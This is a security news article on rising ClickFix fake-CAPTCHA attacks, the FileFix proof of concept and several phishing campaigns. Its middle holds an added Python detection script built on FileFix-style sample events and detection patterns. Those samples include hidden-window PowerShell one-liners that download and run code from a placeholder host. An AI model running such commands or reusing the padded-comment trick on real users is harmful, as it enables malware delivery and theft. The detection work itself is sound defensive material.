
According to ESET data, ClickFix social engineering tactics, used as an initial access vector with fake CAPTCHA validation pages, increased by 517% between the second half of 2024 and the first half of this year.
“The list of threats led by ClickFix attacks grows day by day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors,” said the director of ESET’s Threat Prevention Lab.
ClickFix uses fake error messages or CAPTCHA validation checks to deceive victims into pasting malicious scripts into the Windows Run dialog or the Apple macOS Terminal app and executing them.
The Slovak cybersecurity company said ClickFix detections are concentrated in Japan, Peru, Poland, Spain and Slovakia.
The prevalence and effectiveness of this attack method has led to the emergence of builders that provide ClickFix-weaponized landing pages to other attackers, ESET added.

From Clickfix to FileFix
This development coincides with security researcher MRD0X demonstrating a proof of concept (PoC) for a ClickFix alternative named FileFix, in which the user is tricked into copying a file path and pasting it into the address bar of Windows File Explorer.
The technique achieves essentially the same result as ClickFix but gets there differently: it combines the file upload feature of a web browser with the ability of File Explorer to execute operating system commands typed into its address bar.

In the attack scenario devised by the researcher, a threat actor sets up a phishing page. Instead of showing the target a fake CAPTCHA check, the page displays a message saying that a document has been shared with them and that they need to open the file path by pressing Ctrl+L and pasting it into the address bar.
The phishing page also includes a prominent “Open File Explorer” button that, when clicked, opens File Explorer and copies a malicious PowerShell command to the user’s clipboard. So when the victim pastes the “file path”, the attacker’s command is executed instead.

This is accomplished by altering the copied file path so that the PowerShell command comes first, followed by a long run of spaces that pushes the rest out of view and a pound sign (“#”) that makes PowerShell treat the fake file path as a comment.
“In addition, the PowerShell command concatenates the dummy file path after the comment to hide the command and display only the file path,” MRD0X said.
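Both launch paths described above (a ClickFix paste into the Run dialog and a FileFix paste into the File Explorer address bar) end with explorer.exe spawning a script interpreter, and the FileFix variant additionally leaves a padded “#” comment carrying a fake path in the command line. The following detection logic, an added example that is not from the article, ESET or MRD0X, runs over constructed process-creation events (the field names parent, image and cmdline, and the sample events themselves, are assumptions modelled on a typical EDR or Sysmon record) and flags both patterns:

```python
"""Flag ClickFix/FileFix-style launches in process-creation telemetry.

Added example (not from the article, ESET or MRD0X). The event shape
(parent, image, cmdline), the padding threshold and the sample events
below are constructed assumptions.
"""
import re
from typing import Dict, List, Optional

# FileFix tell-tale: a run of whitespace, then a "#" comment that carries
# something shaped like a Windows path. Legitimate command lines almost
# never pad a comment this way; the padding exists only to push the real
# command out of the address bar's visible area.
MIN_PAD = 8  # assumed threshold; tune against your own baseline
PADDED_COMMENT_RE = re.compile(
    r"(?P<pad>[ \t]{%d,})#\s*(?P<fakepath>(?:[A-Za-z]:\\|\\\\)\S+)" % MIN_PAD
)

# Interpreter options and cmdlets typical of pasted one-liners: hidden
# window, bypassed execution policy, encoded or download-and-run payloads.
SUSPICIOUS_TOKENS = [
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I),
    re.compile(r"-enc(?:odedcommand)?\s+\S+", re.I),
]

# The Run dialog and the File Explorer address bar both launch children
# under explorer.exe, which is why the parent matters for this rule.
USER_SHELL_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def fake_path(cmdline: str) -> Optional[str]:
    """Return the decoy path hidden behind a padded '#' comment, if any."""
    m = PADDED_COMMENT_RE.search(cmdline)
    return m.group("fakepath") if m else None


def classify(event: Dict[str, str]) -> List[str]:
    """Return detection tags for one process-creation event (empty = benign)."""
    tags: List[str] = []
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmdline = event.get("cmdline", "")

    if fake_path(cmdline) is not None:
        tags.append("filefix_padded_comment")

    # Two or more one-liner markers in an interpreter started from the user
    # shell is a strong ClickFix/FileFix signal; one alone is too noisy.
    hits = sum(1 for rx in SUSPICIOUS_TOKENS if rx.search(cmdline))
    if parent in USER_SHELL_PARENTS and image in INTERPRETERS and hits >= 2:
        tags.append("explorer_spawned_hidden_interpreter")
    return tags


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (index, tags) for every event that triggers at least one tag."""
    results = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            results.append((i, tags))
    return results


# Constructed sample events; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    # FileFix-style: command, 120 spaces of padding, then "# <decoy path>".
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://example.invalid/x | iex"'
                + " " * 120 + r"# C:\company\internal\Shared\Q3_report.pdf"},
    # ClickFix-style: hidden-window one-liner pasted into the Run dialog.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/c | iex"'},
    # Benign: a user opened an interactive PowerShell prompt.
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe"},
    # Benign: a scheduled task runs a script with no interpreter flags.
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for index, tags in scan(SAMPLE_EVENTS):
        print(index, tags, fake_path(SAMPLE_EVENTS[index]["cmdline"]))
```

The padded-comment rule is specific to the PowerShell “#” trick the article describes; a cmd.exe variant would need its own comment syntax. The second rule intentionally requires two markers so that an administrator opening a plain PowerShell window from the Start menu does not fire it.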
Plenty of phishing campaigns
The surge in ClickFix campaigns coincides with the discovery of various phishing campaigns, including:
Campaigns that leverage .gov domains to send phishing emails posing as unpaid toll notices, leading to fake pages (LLDS) designed to collect personal and financial information.
Employment-themed lures that deliver ZIP archives containing a Windows shortcut (LNK) file, which launches PowerShell code responsible for deploying Remcos RAT.
Emails alerting users that their mailbox is almost full and that they need to “clear” it by clicking a button embedded in the message, which takes them to an IPFS-hosted phishing page that steals their email credentials. Interestingly, the same emails also carry RAR archive attachments that, when extracted and executed, drop the XWorm malware.
Emails that include a URL leading to a PDF document, which contains another URL that drops a ZIP archive; the archive holds the executable responsible for launching Lumma Stealer.
SMS messages regarding unpaid toll violations that redirect recipients to a deceptive site that harvests personal information and credit card details.
SharePoint-themed emails that redirect users to a credential harvesting page hosted on *.sharepoint[.]com that siphons the user’s Microsoft account password.
“Emails containing SharePoint links are less likely to be flagged as malicious or phishing by EDR or antivirus software. Users tend to believe that Microsoft links are inherently safe,” CyberProof said.
“Because the phishing pages are hosted on SharePoint, they are often dynamic and accessible from a specific link only for a limited time, making it difficult for automated crawlers, scanners and sandboxes to detect them.”